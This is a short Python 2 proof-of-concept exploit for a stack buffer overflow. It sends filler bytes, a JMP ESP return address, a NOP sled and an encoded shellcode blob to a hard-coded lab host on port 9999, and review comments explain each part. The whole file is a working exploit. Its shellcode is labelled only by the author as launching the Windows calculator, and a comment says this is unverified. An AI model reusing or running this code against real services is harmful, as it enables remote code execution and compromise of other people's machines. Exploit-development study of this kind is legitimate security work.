#!/usr/bin/python
# Python 2 script (print-statement syntax, 8-bit str literals): the string
# literals below are sent as raw bytes only under Python 2; under Python 3 they
# are text and s.send() would reject them.
import sys,socket  # sys is imported but never referenced below

# Proof-of-concept stack-overflow client: sends a fixed-size filler, a 4-byte
# overwrite pointing at a JMP ESP gadget, a NOP sled and a shellcode blob to a
# hard-coded host:port. Nothing is parameterised -- target, port, offset and
# gadget address are all constants in this file.

esp = "\xF3\x12\x17\x31" #JMP ESP address (0x311712F3) written little-endian for x86
nops = "\x90"*16 # 16-byte NOP sled (0x90 = x86 NOP) so an imprecise landing still slides into the shellcode
shellcode = "\xbe\x32\x12\xe1\xfa\xda\xdd\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x31\x31\x70\x13\x83\xc0\x04\x03\x70\x3d\xf0\x14\x06\xa9\x76\xd6\xf7\x29\x17\x5e\x12\x18\x17\x04\x56\x0a\xa7\x4e\x3a\xa6\x4c\x02\xaf\x3d\x20\x8b\xc0\xf6\x8f\xed\xef\x07\xa3\xce\x6e\x8b\xbe\x02\x51\xb2\x70\x57\x90\xf3\x6d\x9a\xc0\xac\xfa\x09\xf5\xd9\xb7\x91\x7e\x91\x56\x92\x63\x61\x58\xb3\x35\xfa\x03\x13\xb7\x2f\x38\x1a\xaf\x2c\x05\xd4\x44\x86\xf1\xe7\x8c\xd7\xfa\x44\xf1\xd8\x08\x94\x35\xde\xf2\xe3\x4f\x1d\x8e\xf3\x8b\x5c\x54\x71\x08\xc6\x1f\x21\xf4\xf7\xcc\xb4\x7f\xfb\xb9\xb3\xd8\x1f\x3f\x17\x53\x1b\xb4\x96\xb4\xaa\x8e\xbc\x10\xf7\x55\xdc\x01\x5d\x3b\xe1\x52\x3e\xe4\x47\x18\xd2\xf1\xf5\x43\xb8\x04\x8b\xf9\x8e\x07\x93\x01\xbe\x6f\xa2\x8a\x51\xf7\x3b\x59\x16\x07\x76\xc0\x3e\x80\xdf\x90\x03\xcd\xdf\x4e\x47\xe8\x63\x7b\x37\x0f\x7b\x0e\x32\x4b\x3b\xe2\x4e\xc4\xae\x04\xfd\xe5\xfa\x66\x60\x76\x66\x47\x07\xfe\x0d\x97\xb8\x4b\x37\xcc\x5d\xdb\xde\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\x12\x31\x46\x12\x83\xc6\x04\x03\x0d\x39\x2e\xa8\xa0\x9e\x59\xb0\x91\x63\xf5\x5d\x17\xed\x18\x11\x71\x20\x5a\xc1\x24\x0a\x64\x2b\x56\x23\xe2\x4a\x3e\x74\xbc\x1e\x3e\x1c\xbf\x60\x3f\x66\x36\x81\x8f\xfe\x19\x13\xbc\x4d\x9a\x1a\xa3\x7f\x1d\x4e\x4b\xee\x31\x1c\xe3\x86\x62\xcd\x91\x3f\xf4\xf2\x07\x93\x8f\x14\x17\x18\x5d\x56" #shellcode = windows calc (author's label only; the blob is not otherwise documented here -- NOTE(review): verify its provenance before trusting the description)

# 524 filler bytes (presumably the distance to the saved return address -- TODO
# confirm against the target binary), then the 4-byte overwrite, then the sled
# and the shellcode.
payload = "A"*524 + esp + nops + shellcode

# Plain TCP with no TLS: the whole payload crosses the wire in the clear, so a
# long run of 0x41 followed by a 0x90 sled is readily matched by network IDS.
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.59',9999)) # hard-coded lab target; socket.connect() returns None, so 'connect' is never used
print s.recv(1024) # read the service banner before sending
s.send(payload)
print s.recv(1024) # NOTE(review): no error handling -- a reset connection raises socket.error here and s.close() below is skipped
s.close()